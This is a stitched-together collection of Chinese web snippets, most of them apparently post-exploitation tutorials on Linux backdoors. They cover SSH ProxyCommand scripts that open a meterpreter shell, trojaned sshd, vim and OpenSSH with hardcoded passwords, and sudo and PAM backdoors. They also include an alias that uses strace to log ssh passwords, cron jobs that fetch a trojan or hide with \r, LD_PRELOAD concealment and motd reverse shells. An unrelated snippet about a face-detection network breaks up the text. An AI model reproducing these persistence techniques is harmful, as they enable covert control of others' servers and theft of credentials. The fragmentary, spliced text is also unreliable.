ssh 客户端配置文件加载顺序 命令行参数 > ~/.ssh/config > /etc/ssh/ssh_config Ubuntu server 16.04 默认 /etc/ssh/ssh_config.../identity # IdentityFile ~/.ssh/id_rsa # IdentityFile ~/.ssh/id_dsa # IdentityFile ~/.ssh/id_ecdsa..._create_unverified_context());exec(r.read());" 创建 ~/.ssh/config 如果.ssh目录不存在就创建这个目录,可以直接将 /etc/ssh/ssh_config...,可以直接将 /etc/ssh/ssh_config 复制过来 创建恶意脚本文件 /tmp/evil.sh ?...设置~/.ssh/config 中Host为*处设置 ProxyCommand 参数为执行我们的恶意脚本,并保存 ssh连接其他主机 成功获取meterpreter shell ProxyCommand
/p/6495884.html http://blackwolfsec.cc/2017/03/24/Linux_ssh_backdoor/ 0x02 SSH Wapper 后门 cd /usr/sbin...关于上面这行代码含义可以参考如下链接: https://docs.python.org/3/library/struct.html 0x03 ssh key 后门 在我们的攻击机中使用 ssh-keygen...-t rsa 生成公私钥 生成的文件在 ~/.ssh/ ?...SSH后门到此结束!...PS: Ubuntu 安装ssh后门程序需要的一些库 libssl-dev sudo apt install -y zlib1g zlib1g-dev apt-get install libpam0g-dev
在服务器木马后门检测中rookit也是根据特征的,他们检查的都是某一些rk的看这个root或者一些其他的通用型root的,但我现在所使用的项目,它这个UK的可能比较小众,所以没有被检测出来。...那第二种方法就是说这种就比较顽强的了,你要把Linux挂载到其他的Linux系统上,去找到它,这样的话把它删除掉就可以了。...那请勿在生产环境测试的因为rookit并不是一个稳定的内核,一旦插入的内核有可能导致整个Linux崩溃,如果遇到一些被替换了系统命令文件的木马后门无法查找的话可以向服务器安全服务商SINE安全寻求技术支持进行详细的木马后门排查
hitokoto.innerText = data.hitokoto; } } xhr.send(); 前言 相信大家在做渗透测试的时候,会遇到后渗透阶段的权限维持问题,常见的linux...后门有crontab后门(在计划任务里添加反弹shell任务),超级用户后门(也就是uid=0的用户),ssh免密登录后门等等等~~~[aru_5],当然你有能力的话,可以试试破解root密码~~这里我就详细的教大家如何利用...ssh后门和计划任务后门(下次讲,这次懒得写了~)进行权限维持。...ssh免密登录后门 ssh免密登录就是在自己的攻击机上生成一个密钥,然后把他放进目标主机的ssh密钥存放文件里(个人理解~),然后攻击机就可以拿着这个密钥直接连接目标主机了,不需要密码,当然后门嘛,...chmod 700 ~/.ssh 详细操作可看下图: 4.在攻击机上使用免密登录测试 ssh -i /root/.ssh/id_rsa root@目标ip 测试截图如下: 可以看到不用密码就直接进入了目标服务器
背景颜色来判断最终结果 默认背景颜色为 dark 系统配置背景颜色为 dark 用户配置背景颜色为白色 现在打开 1.txt 查看背景颜色 配置最终以用户配置为准,但是似乎背景颜色没有改成白色,难道是 ssh...环境变量的方式进行配置 果然,$VIMRUNTIME 是从 Linux 操作系统的环境变量来的 因此永久修改 VIMRUNTIME 不一定会修改 runtimepath ,只有通过Linux...,相信在以后还会对现在写的后门手法进行补充 0x04 vim 自身文件后门 这类后门比较简单粗暴,直接替换相关文件,暂时未发现 vim 存在自身使用的 .so 共享库文件,因此本章节以直接替换命令本身为例...制作后门文件 1) 下载源代码 在相同版本的 Linux 主机 B 上下载相同版本 vim 源代码 在主机B上编辑更新源,取消 deb-src 的注释 在主机 B 上下载 vim 源代码(可以指定版本...成功创建了有效的带有后门,且功能正常的 vim 3) 用后门vim替换 /usr/bin/vim 4) 模拟正常使用vim触发后门 成功触发后门 5) 小结 几乎每一种后门都可以用这样的方法
$(nohup vim -E -c "py3file demo.py"> /dev/null 2>&1 &) && sleep 2 && rm -f demo....
sudo 经常被用来将普通用户权限提升至 root 权限,代替 root 执行部分程序来管理 Linux 系统,这样避免 root 密码被泄漏 这篇文章介绍了三种利用其留后门的方法,其中也涉及一个sudo...有趣的特性,在极端条件下可能是系统的薄弱点;同时涉及一个没什么人关注的小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门 这篇文章以 Ubuntu Server...22.10 为例 0x01 sudo 配置后门 1) 简介 通常的应用场景中,配置 sudo 主要是用来赋予某个用户或者用户组能够以 root(或其他用户) 的身份(以及权限)执行部分(或全部) 程序...空白文件名 文件 + alias 劫持的方法来隐藏新建文件 有时候也没必要新建用户,可以尝试开启那些系统用户试试,或许有惊喜也说不定,但是这种操作一定要提前试一试 0x02 sudoedit 文件所有者后门...这个后门更偏向于一个概念性的后门,以趣味性为主吧 前段时间复现 CVE-2023-22809 的时候关注到 sudoedit (sudo -e) 这个程序,这个程序用来让可以sudo的用户通过 sudoedit
/etc/profile 、 /etc/bashrc 、~/.bashrc、~/.bash_profile 、~/.profile 、~/.bash_logout /etc/profile 【系统级】Linux...也是存在的,所以这些都是"藏污纳垢"的好地方 0x03 alias 后门分析&制作 当前用户目录下.bashrc alias ssh='strace -o /tmp/sshpwd-`date '+%d...%h%m%s'`.log -e read,write,connect -s2048 ssh' 上面是我搜索了10多篇文章,发现的同一条后门命令,既然有前辈写了,咱们就分析分析 上面后门中,其实 alias...只是做了一个小技巧,而不是主要的后门命令,含义也就是将当前用户的ssh命令修改为 strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,...可以看到我们之前提交的数据,同时呢,这个文件返回的内容也比较多,只要改一个好点的名字可能会让安全管理人员认为是正常的文件 这种后门的场景就是用户登录到这台主机上后,使用这台主机的ssh去远程连接其他主机才能引发后门
对于UNIX系统来说,ssh服务端作为最广泛应用的远程管理服务并且有一定对外开放的必然性,必然引起黑客关注,所以ssh类的后门也是unix下最经典的后门方式之一了。...目前,所谓openssh,Dropbear SSH等,都是ssh协议的工具体现 所谓后门是在渗透完成之后的阶段,攻击者获取到一台服务器的root权限后,需要通过后门长期能够控制这台服务器...,同时后门又需要躲避管理员的检测。...爆发时间:2007年就存在,2014年卷土重来 SSh后门: 该恶意软件绑定了一个Dropbear SSH的后门,后门程序如下: Set WshShell = CreateObject(“WScript.Shell...匹配软件MD5值以免软件被替换 配置安全:做好基线检测,服务器被入侵后,往往会修改用户配置,而通常hids并不会去检测文件的内容。
Linux 计划任务是一项服务,由 cron 工具来完成,主要目的就是在无需人工干预的情况下运行作业 PS: 功能较为简单的at命令在Ubuntu 16.04中已经不自带了 0x01 cron服务简介...一会儿再说吧(Linux上万物皆文件,肯定是文件啦!)...3 * * * rm -r /home/xxxx/test/* 每隔10分钟下载一下我们的木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用...0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab...这种利用方法巧妙在使用了windows中的 \r( Linux 中显示为M),导致显示截断,从而隐藏我们真实的计划任务,我们使用crontab -e 可以看到真实的计划任务如下: ?
权限维持-Linux-替换版本-OpenSSH后门 这里复现也真是奇怪,在靶机上没复现成功,在服务器上复现成功了 原理:替换本身操作系统的ssh协议支撑软件openssh,重新安装自定义的openssh...可以找到以读写方式记录在文件中的SSH后门密码文件的位置,并通过该方法判断是否存在SSH后门。当然,也有不记录密码,而仅仅留下一个万能SSH后门的情况。...权限维持-Linux-更改验证-SSH-PAM后门 参考:https://xz.aliyun.com/t/7902 PAM是一种认证模块,PAM可以作为Linux登录验证和各类基础服务的认证,简单来说就是一种用于...1.1.8.tar.gz tar -zxvf Linux-PAM-1.1.8 yum install gcc flex flex-devel -y -修改配置: 留PAM后门和保存SSH登录的账号密码...-登录方式-软链接&公私钥&新帐号 SSH软链接 在sshd服务配置启用PAM认证的前提下,PAM配置文件中控制标志为sufficient时,只要pam_rootok模块检测uid为0(root)即可成功认证登录
0x00 前情提要 在 alias 后门 | Linux 后门系列一文中,我们为了让后门完美一些,修改了后门文件的 atime、mtime,但是 ctime 一直没有办法修改,今天我们来把这一块补齐,...让后门更加完美 atime -> access time, 访问时间 mtime -> modify time,修改时间 ctime -> change time, 状态变化时间 最新版 Linux 中多了一个属性...所以可以查看 stat 的源代码,看一下 stat 应用是如何获取和管理 ctime 的,针对其调用的方法进行系统性地修改应该也是可以实现修改文件 ctime 的 0x03 系统时钟与硬件时钟 Linux...时间系统分为系统时钟和硬件时钟,系统时钟存在于Linux 内核中,而硬件时钟存在于硬件主板上 从两种时钟的命名上可以看出,硬件时钟肯定是要比系统时钟更加持久,毕竟系统时钟系统关机就没了嘛 硬件时钟靠着.../etc/update-manager/ 如果是需要执行的后门,现在执行并放置后台,如果像 alias 那种配置文件后门则不需要此章节 /etc/update-manager/release-update
加固后门 正常大家检查是否存在 LD_PRELOAD 后门的时候都是直接 echo $LD_PRELOAD ?...咱们把劫持 unalias 和劫持 alias 放在最后,先把这些命令都劫持一下: env 没有后门时候是这样的 ? 设置了后门之后是这样的 ?...成功劫持 export 没有设置后门时候是这样的 ? 设置后门后是这样的 ?...劫持成功 现在我们来进行验证后门还好用吗 ? 可以看到后门可以使用,那么现在我们来看一下以上各种方法还能否看见我们做的手脚 ? 完美!...和 pwd 命令,此时,两个都可以执行 payload ltrace 追踪 ssh、id 等命令的时候不会触发 payload 问了一圈人,也没人知道咋回事,到现在我也不知道具体因为什么,如果哪位兄弟知道
本文链接:https://blog.csdn.net/chaipp0607/article/details/100578202 简介 SSH是一个用于人脸检测的one-stage检测器,提出于2017...年8月,在当时取得了state-of-art的效果,论文是《SSH: Single Stage Headless Face Detector》,SSH本身的方法上没有太多新意,更多的是在把通用目标检测的方法往人脸检测上应用...这种跨层的信息融合在通用目标检测网络中很常见,比如YOLOv2里面那个奇怪的reorg操作,在SSH之后的文章中,也有很多使用了这种思想,比如YOLOv3和FPN。...Anchor设置 由于SSH用于人脸检测,它的Anchor选取和RPN有所区别,它将人脸默认为正方形,所以Anchor只有一种比例,1:1。...SSH性能评价 首先是SSH的耗时统计(NVIDIA Quadro P6000): ?
,是Linux中发送问候消息的功能,一般在我们登录服务器后显示 每次任意用户登录时都会触发motd服务的功能,这个功能的脚本几乎都是使用root 权限来启动的,所以很适合用来做后门 实用部分 随着关注我们的朋友越来越多...root权限 留后门 这个目录下的所有文件在任意用户登录后都会执行一遍,所以我们可以选择新建一个脚本或者修改其中的脚本来完成留后门的目的 以 00-header 文件为例 #!...- Linux 命令搜索引擎 https://wangchujiang.com/linux-command/c/trap.html # Construct a user agent, similar to...是如何使策略配置生效的 参考 Linux Source Command with Examples https://linuxhint.com/linux-source-command-examples...脚本本身就有好多代码,如果在其中插入一些隐蔽的指令或者干脆使用上面探究的 source 的方法,其实是很难发现的 插入指令后登录功能卡住 有些场景下,插入我们的指令后出现登录卡住的问题,当然反弹shell 没有问题,ssh
Doki,被称为是一个完全无法检测到的Linux后门,主要利用一种无记录的方法,通过狗狗币(一种加密货币)区块链来联系其运营商,从而动态生成其C2域地址。 ?...再加上Doki还利用zmap、zgrap和jq等扫描工具,利用受感染的系统进一步扫描网络中与Redis,Docker,SSH和HTTP相关的端口,存在更大的威胁隐患。...令人惊讶的是,目前它仍然无法被61个顶级恶意软件检测引擎中的任何一个所检测到。...参考来源 https://thehackernews.com/2020/07/docker-linux-malware.html
备份原文件: 1、mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old 2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old...3、下载并安装ssh后门: 将sshdb.tgz后门程序放置到你自己的服务器的某目录下,并且改成为test.tgz,这里为www.test.com的根目录下 # wget http://www.test.com.../test.tgz # tar zxvf test.tgz # cd openssh 4、设置ssh后门的登录密码: vi includes.h define _SECRET_PASSWD "test1234..." -> #test1234位后门连接密码 5、编译安装: # ..../etc/ssh/sshd_config 重启服务 # /etc/init.d/sshd restart 6、登入后门: ssh -l root IP password:123456 echo
d在我们攻防当中,常常会碰到linux机器,拿到之后为了避免发现 低权限升高权限 创建一个c文件 #include int main() { setuid(0);
perl 和 Python 在做反弹shell基本差不多,Python 那一节有点讲的太多了,大家可以对比一下参数,照着Python的思路移到 perl 上,我...
引言 在《利用系统特性伪装成一个免密登陆后门》一文中,我介绍过利用系统特性伪装成一个ssh系统后门,不过,这个后门需要新开一个端口,而本文介绍的这个后门只需要系统上开放了ssh服务就行了,不需要额外的开放端口...后门简介 这个ssh 后门伪装成一个perl脚本,名为sshd,位于/usr/sbin/sshd , 将系统原先的sshd 移到/usr/bin下 sshd后门源码: #!...chmod +x /usr/sbin/sshd 重启 ssh 服务 ?...22 端口是sh 和 控制端连接,程序名是ssh ,而不是正常的sshd 为了增强隐秘性, 我们可以将copy 一份/bin/sh, 重命名为/bin/sshd,修改后门源码为: #!...另外也可以定期检测系统关键文件的hash是否发生变化,位置是否发生变化,这样就能发现是否有异常
领取专属 10元无门槛券
手把手带您无忧上云